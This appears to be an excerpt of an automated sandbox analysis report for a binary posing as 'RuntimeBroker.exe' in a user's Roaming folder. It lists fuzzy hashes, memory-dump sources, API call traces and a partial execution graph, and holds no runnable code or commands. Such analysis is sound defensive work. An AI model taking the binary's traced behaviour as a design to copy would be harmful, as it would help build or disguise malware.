                                                                                                                                                                                • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D118A21E0815242F666AB5DED842799251FF88780FD49031DA4906FAACD2DD4D19B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                • Instruction ID: 0aa61c38757d4473b194e0fc7a595c17f3637b4adb96f75ecb8809fc0d7c5ecc
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C11AC22B14F058AEB20DF64EC542B873A0FB09718F840E30DA2D86BB4DF3CD1A98750
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                • Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                                                                                                • Instruction ID: bfc7b82fc04d67e8bb8ad6151a97703bd95c905b85d1948e50f44f589680d349
                                                                                                                                                                                • Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                                                                                                • Instruction Fuzzy Hash: 58411622F1868242FB76AB29984137DE650EB84BA4F984235EE5D06AF5DF3CD441CF10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abort$CreateFrameInfo
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 2697087660-1018135373
                                                                                                                                                                                • Opcode ID: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
                                                                                                                                                                                • Instruction ID: bcab92e8d25d4cc96c9169b962108c49081e20c7e65ad0b1edca16f543e51396
                                                                                                                                                                                • Opcode Fuzzy Hash: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E51813765878286D620DF1AE45126E77A6FF89B90F140535EB8D07B66CF3CE560CB08
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06835E
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: HeapFree.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72B05BEC5), ref: 00007FF72B06837C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                • API String ID: 3580290477-1543962311
                                                                                                                                                                                • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                                                                                                • Instruction ID: 2539bdd8084f1cd2cc6cc6601e85a136772b5529dc3f92943a57d9aae840575e
                                                                                                                                                                                • Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F419631B08B5685EB36EF299C400BDA394FF497D0B95403AEA4D47B65DE3CE4818B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: .$:
                                                                                                                                                                                • API String ID: 2020911589-4202072812
                                                                                                                                                                                • Opcode ID: 24ee215d7582a2cd552c3f07ddcefb7c5f794b6247eec297d1379fda90ff5b76
                                                                                                                                                                                • Instruction ID: 3de1c373dcebb7a7a1ded97751d954f820a9a13e697d439caecd80a629144a43
                                                                                                                                                                                • Opcode Fuzzy Hash: 24ee215d7582a2cd552c3f07ddcefb7c5f794b6247eec297d1379fda90ff5b76
                                                                                                                                                                                • Instruction Fuzzy Hash: 20414122F0875298FB22EBB99C511FC66B4EF18758F94003DDE4D67A69DF3894468B30
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                • String ID: U
                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                • Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                                                                                                • Instruction ID: 873119857340cf7b81fbacf03a0b6f62e81bee505d084e97a1210ff757f0c809
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C41B462B19A8581EB31AF29E8443B9B760FB88794F944035EE4D877A8DF7CD441CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID: void$void
                                                                                                                                                                                • API String ID: 2943138195-3746155364
                                                                                                                                                                                • Opcode ID: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
                                                                                                                                                                                • Instruction ID: ce4e801f37c10c4626536e7532735f535115e307f95c11c31b9b64a11a7e1c76
                                                                                                                                                                                • Opcode Fuzzy Hash: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D313762E68A6698FB10CB68D8910EC37B5BF48748F440136EF4E22B69DF3CA144C758
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                • String ID: :
                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                • Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                                                                                                                                                • Instruction ID: 9fadecb3cbe0a180659dfe13074b00e3369982ddbd98cc857283155f580d1264
                                                                                                                                                                                • Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 0621C322B0878181EB71AB19D85427EF3A1FB88B48FD54039D68D436A5DF7CE545CF60
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileHeader$ExceptionRaise
                                                                                                                                                                                • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                                                                • API String ID: 3685223789-3176238549
                                                                                                                                                                                • Opcode ID: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
                                                                                                                                                                                • Instruction ID: 0c794fa41957efb71b8f6c320988aef9dc529ec445a5ae009f87784bc4ee2b9e
                                                                                                                                                                                • Opcode Fuzzy Hash: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
                                                                                                                                                                                • Instruction Fuzzy Hash: 610171A1AADA4691EF44DB5CE8A01796322FF90B84F805431E74E076BAEF6DD544C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                • Instruction ID: 89fd6c935d8d503beee6f9cc5e23c572ea05b56471c3aedf89196a466fab4410
                                                                                                                                                                                • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                • Instruction Fuzzy Hash: 66112E36619B4582EB629B19F840269B7E4FB88B84F584231DBCD07B68DF3CD5518B10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                • Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                                                                                                                                                • Instruction ID: fc8a6fd9073f8cdc26e931b1be50d9218fa0784eb2f22e35626ae10083f97bf0
                                                                                                                                                                                • Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                                                                                                                                                • Instruction Fuzzy Hash: 09115132618B8182EB558F19F450269B7A6FF88B84F284231EF8D07769DF3DD551C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: :
                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                • Instruction ID: 6141efd89a2519dc5b38a0b070ed4cf00c9d334f55a5d81c2ab38af2b1b0785d
                                                                                                                                                                                • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                • Instruction Fuzzy Hash: 80018461B1C24285F732BF689C6127EA390FF4C748FC41039D55D826A5DE7CE504CE24
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FFE0C0B65B9,?,?,?,?,00007FFE0C0BFB22,?,?,?,?,?), ref: 00007FFE0C0B674B
                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FFE0C0B65B9,?,?,?,?,00007FFE0C0BFB22,?,?,?,?,?), ref: 00007FFE0C0B67D4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                • Opcode ID: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
                                                                                                                                                                                • Instruction ID: 66cc290cb268a5003d1ad91ba2a067464948a6e597e14ad013dfa87586c3f31b
                                                                                                                                                                                • Opcode Fuzzy Hash: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
                                                                                                                                                                                • Instruction Fuzzy Hash: 10113364EC965242FA58D72998641392293AF48BA0F144634EA6E077F5DF2DE941C708

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:10.1%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:3.8%
                                                                                                                                                                                Total number of Nodes:1751
                                                                                                                                                                                Total number of Limit Nodes:58
                                                                                                                                                                                execution_graph 24296 b410b5 24301 b4668f 24296->24301 24298 b410ba 24309 b61932 29 API calls 24298->24309 24300 b410c4 24302 b4669b __EH_prolog3 24301->24302 24310 b4d467 GetCurrentProcess GetProcessAffinityMask 24302->24310 24304 b466a5 24311 b511a5 24304->24311 24306 b466fc 24315 b468b3 GetCurrentProcess GetProcessAffinityMask 24306->24315 24308 b46719 24308->24298 24309->24300 24310->24304 24312 b511b1 __EH_prolog3 24311->24312 24316 b44a2c 41 API calls 24312->24316 24314 b511ca 24314->24306 24315->24308 24316->24314 26557 b600b3 DialogBoxParamW 24320 b6bab0 24328 b6d3ff 24320->24328 24324 b6bacc 24325 b6bad9 24324->24325 24336 b6bae0 11 API calls 24324->24336 24327 b6bac4 24337 b6d2e8 24328->24337 24331 b6d43e TlsAlloc 24334 b6d42f 24331->24334 24333 b6baba 24333->24327 24335 b6ba29 20 API calls 2 library calls 24333->24335 24344 b610f9 24334->24344 24335->24324 24336->24327 24338 b6d318 24337->24338 24340 b6d314 24337->24340 24338->24331 24338->24334 24340->24338 24342 b6d338 24340->24342 24351 b6d384 24340->24351 24341 b6d344 GetProcAddress 24343 b6d354 _abort 24341->24343 24342->24338 24342->24341 24343->24338 24345 b61102 IsProcessorFeaturePresent 24344->24345 24346 b61101 24344->24346 24348 b61314 24345->24348 24346->24333 24358 b612d7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24348->24358 24350 b613f7 24350->24333 24352 b6d3a5 LoadLibraryExW 24351->24352 24357 b6d39a 24351->24357 24353 b6d3c2 GetLastError 24352->24353 24354 b6d3da 24352->24354 24353->24354 24355 b6d3cd LoadLibraryExW 24353->24355 24356 b6d3f1 FreeLibrary 24354->24356 24354->24357 24355->24354 24356->24357 24357->24340 24358->24350 24359 b4d4bd 24360 b4d4cf __cftof 24359->24360 24363 b531c2 24360->24363 24366 b53184 GetCurrentProcess GetProcessAffinityMask 24363->24366 24367 b4d526 24366->24367 26632 b6aaba 55 API calls _free 26559 b5b4a0 ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24410 b6e6a1 31 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 24413 b610a8 24414 b610b2 24413->24414 24417 b60d3a 24414->24417 24443 b60a98 24417->24443 24419 b60d4a 24420 b60da7 24419->24420 24432 b60dcb 24419->24432 24421 b60cd8 DloadReleaseSectionWriteAccess 6 API calls 24420->24421 24422 b60db2 RaiseException 24421->24422 24439 b60fa0 24422->24439 24423 b60e43 LoadLibraryExA 24424 b60e56 GetLastError 24423->24424 24425 b60ea4 24423->24425 24426 b60e7f 24424->24426 24427 b60e69 24424->24427 24430 b60eb6 24425->24430 24431 b60eaf FreeLibrary 24425->24431 24433 b60cd8 DloadReleaseSectionWriteAccess 6 API calls 24426->24433 24427->24425 24427->24426 24428 b60f14 GetProcAddress 24429 b60f72 24428->24429 24434 b60f24 GetLastError 24428->24434 24452 b60cd8 24429->24452 24430->24428 24430->24429 24431->24430 24432->24423 24432->24425 24432->24429 24432->24430 24435 b60e8a RaiseException 24433->24435 24436 b60f37 24434->24436 24435->24439 24436->24429 24438 b60cd8 DloadReleaseSectionWriteAccess 6 API calls 24436->24438 24440 b60f58 RaiseException 24438->24440 24441 b60a98 ___delayLoadHelper2@8 6 API calls 24440->24441 24442 b60f6f 24441->24442 24442->24429 24444 b60aa4 24443->24444 24445 b60aca 24443->24445 24460 b60b41 24444->24460 24445->24419 24447 b60aa9 24448 b60ac5 24447->24448 24463 b60c6a 24447->24463 24468 b60acb GetModuleHandleW GetProcAddress GetProcAddress 24448->24468 24451 b60d13 24451->24419 24453 b60d0c 24452->24453 24454 b60cea 24452->24454 24453->24439 24455 b60b41 DloadReleaseSectionWriteAccess 3 API calls 24454->24455 24456 b60cef 24455->24456 24457 b60d07 24456->24457 24458 b60c6a DloadProtectSection 3 API calls 24456->24458 24471 b60d0e GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24457->24471 24458->24457 24469 b60acb GetModuleHandleW GetProcAddress GetProcAddress 24460->24469 24462 b60b46 24462->24447 24464 b60c7f DloadProtectSection 24463->24464 24465 b60cba VirtualProtect 24464->24465 24466 b60c85 24464->24466 24470 b60b80 VirtualQuery GetSystemInfo 24464->24470 24465->24466 24466->24448 24468->24451 24469->24462 24470->24465 24471->24453 26561 b41095 44 API calls 26562 b41890 86 API calls Concurrency::cancel_current_task 26635 b6e680 GetProcessHeap 26567 b61cf3 20 API calls 26636 b6caf0 71 API calls _free 26637 b72ef0 IsProcessorFeaturePresent 26569 b424e0 26 API calls std::bad_exception::bad_exception 24767 b5dae0 24768 b5daf2 24767->24768 24942 b41366 24768->24942 24771 b5e250 25039 b5f9ee 24771->25039 24772 b5db5c 24776 b5dbd0 24772->24776 24777 b5db6d 24772->24777 24855 b5db76 24772->24855 24773 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24775 b5e555 24773->24775 24781 b5dc63 GetDlgItemTextW 24776->24781 24787 b5dbe6 24776->24787 24782 b5db71 24777->24782 24783 b5dbad 24777->24783 24779 b5e279 24785 b5e293 GetDlgItem SendMessageW 24779->24785 24786 b5e282 SendDlgItemMessageW 24779->24786 24780 b5e26b SendMessageW 24780->24779 24781->24783 24784 b5dca0 24781->24784 24792 b50597 53 API calls 24782->24792 24782->24855 24789 b5dc94 